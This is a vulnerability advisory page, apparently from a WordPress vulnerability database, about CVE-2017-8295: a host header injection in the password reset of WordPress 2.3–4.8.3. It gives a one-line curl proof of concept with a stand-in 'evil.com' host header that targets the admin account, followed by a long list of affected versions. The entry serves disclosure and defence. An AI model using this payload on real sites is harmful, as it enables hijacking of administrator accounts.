WordPress Vulnerabilities

WordPress 2.3-4.8.3 - Host Header Injection in Password Reset

Description

Attacker may be able to set the 'From' email header in password reset emails.

Proof of Concept

curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword

Affects WordPress

3.8.1
No known fix
3.8
No known fix
3.7.1
No known fix
3.6
No known fix
3.5.2
No known fix
3.5.1
No known fix
3.5
No known fix
3.4.2
No known fix
3.4.1
No known fix
3.4
No known fix
3.3.3
No known fix
3.3.2
No known fix
3.3.1
No known fix
3.3
No known fix
3.2.1
No known fix
3.2
No known fix
3.1.4
No known fix
3.1.3
No known fix
3.1.2
No known fix
3.1.1
No known fix
3.1
No known fix
3.0.6
No known fix
3.0.5
No known fix
3.0.4
No known fix
3.0.3
No known fix
3.0.2
No known fix
3.0.1
No known fix
3.0
No known fix
2.9.2
No known fix
2.9.1
No known fix
2.9
No known fix
2.8.6
No known fix
2.8.5
No known fix
2.8.4
No known fix
2.8.3
No known fix
2.8.2
No known fix
2.8.1
No known fix
2.8
No known fix
2.7.1
No known fix
2.7
No known fix
2.6.5
No known fix
2.6.3
No known fix
2.6.2
No known fix
2.6.1
No known fix
2.6
No known fix
2.5.1
No known fix
2.5
No known fix
2.3.3
No known fix
2.3.2
No known fix
2.3.1
No known fix
2.3
No known fix
3.6.1
No known fix
3.9
No known fix
3.9.1
No known fix
3.7
No known fix
3.8.2
No known fix
3.8.3
No known fix
3.9.2
No known fix
4.0
No known fix
4.1
No known fix
4.1.1
No known fix
4.2
No known fix
3.9.3
No known fix
4.1.2
No known fix
4.2.1
No known fix
4.0.1
No known fix
4.1.5
No known fix
4.1.4
No known fix
4.1.3
No known fix
3.8.4
No known fix
3.7.4
No known fix
4.2.3
No known fix
3.8.8
No known fix
3.8.5
No known fix
3.8.6
No known fix
3.8.7
No known fix
3.7.2
No known fix
3.7.3
No known fix
3.7.5
No known fix
3.7.6
No known fix
3.7.7
No known fix
3.7.8
No known fix
3.7.9
No known fix
3.8.9
No known fix
3.9.4
No known fix
3.9.5
No known fix
3.9.6
No known fix
3.9.7
No known fix
4.0.2
No known fix
4.0.3
No known fix
4.0.4
No known fix
4.0.5
No known fix
4.0.6
No known fix
4.1.6
No known fix
4.2.2
No known fix
4.2.4
No known fix
4.1.7
No known fix
4.0.7
No known fix
3.9.8
No known fix
3.8.10
No known fix
3.7.10
No known fix
4.3
No known fix
4.3.1
No known fix
4.2.5
No known fix
4.1.8
No known fix
4.0.8
No known fix
3.9.9
No known fix
3.8.11
No known fix
3.7.11
No known fix
4.4
No known fix
3.7.12
No known fix
3.8.12
No known fix
3.9.10
No known fix
4.0.9
No known fix
4.1.9
No known fix
4.2.6
No known fix
4.3.2
No known fix
4.4.1
No known fix
4.4.2
No known fix
4.3.3
No known fix
4.2.7
No known fix
4.1.10
No known fix
4.0.10
No known fix
3.9.11
No known fix
3.8.13
No known fix
3.7.13
No known fix
4.5
No known fix
4.5.1
No known fix
3.7.14
No known fix
3.8.14
No known fix
3.9.12
No known fix
4.0.11
No known fix
4.1.11
No known fix
4.2.8
No known fix
4.3.4
No known fix
4.4.3
No known fix
4.5.2
No known fix
4.5.3
No known fix
3.7.15
No known fix
3.8.15
No known fix
3.9.13
No known fix
4.0.12
No known fix
4.1.12
No known fix
4.2.9
No known fix
4.3.5
No known fix
4.4.4
No known fix
4.6
No known fix
3.7.16
No known fix
3.8.16
No known fix
3.9.14
No known fix
4.0.13
No known fix
4.1.13
No known fix
4.2.10
No known fix
4.3.6
No known fix
4.4.5
No known fix
4.5.4
No known fix
4.6.1
No known fix
4.7
No known fix
3.7.17
No known fix
3.8.17
No known fix
3.9.15
No known fix
4.0.14
No known fix
4.1.14
No known fix
4.2.11
No known fix
4.3.7
No known fix
4.4.6
No known fix
4.5.5
No known fix
4.7.1
No known fix
4.6.2
No known fix
3.7.18
No known fix
3.8.18
No known fix
3.9.16
No known fix
4.0.15
No known fix
4.1.15
No known fix
4.2.12
No known fix
4.3.8
No known fix
4.4.7
No known fix
4.5.6
No known fix
4.6.3
No known fix
4.7.2
No known fix
3.7.19
No known fix
3.8.19
No known fix
3.9.17
No known fix
4.0.16
No known fix
4.1.16
No known fix
4.2.13
No known fix
4.3.9
No known fix
4.4.8
No known fix
4.5.7
No known fix
4.6.4
No known fix
4.7.3
No known fix
3.7.20
No known fix
3.8.20
No known fix
3.9.18
No known fix
4.0.17
No known fix
4.1.17
No known fix
4.2.14
No known fix
4.3.10
No known fix
4.4.9
No known fix
4.5.8
No known fix
4.6.5
No known fix
4.7.4
No known fix
4.7.5
No known fix
4.6.6
No known fix
4.5.9
No known fix
4.4.10
No known fix
4.3.11
No known fix
4.2.15
No known fix
4.1.18
No known fix
4.0.18
No known fix
3.9.19
No known fix
3.8.21
No known fix
3.7.21
No known fix
4.7.6
No known fix
4.8
No known fix
4.8.1
No known fix
4.8.2
No known fix
4.6.7
No known fix
4.5.10
No known fix
4.4.11
No known fix
4.3.12
No known fix
4.2.16
No known fix
4.1.19
No known fix
3.9.20
No known fix
4.0.19
No known fix
3.8.22
No known fix
3.7.22
No known fix
4.8.3
No known fix

References

CVE
CVE-2017-8295
URL
https://core.trac.wordpress.org/ticket/25239
URL
https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

Miscellaneous

Submitter
ethicalhack3r
Submitter twitter
dewhurstsec
Verified
No
WPVDB ID
b3f2f3db-75e4-4d48-ae5e-d4ff172bc093

Timeline

Publicly Published
2017-05-03 (about 7 years ago)
Added
2017-05-05 (about 7 years ago)
Last Updated
2020-09-22 (about 3 years ago)

Other

Published
Title
Published
2014-08-01
Title
WP Online Store 1.3.1 - index.php Multiple Parameter Traversal Arbitrary File Access
Published
2024-01-16
Title
Author Box, Guest Author and Co-Authors for Your Posts – Molongui < 4.7.5 - Information Exposure via ma_debug
Published
2014-08-01
Title
RokBox <= 2.13 - thumb.php src Parameter Malformed Input Path Disclosure
Published
2014-08-01
Title
Method 2.1 - dl-skin.php _mysite_delete_skin_zip Parameter Absolute Path Traversal Remote Directory Deletion
Published
2014-08-01
Title
Method 2.1 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download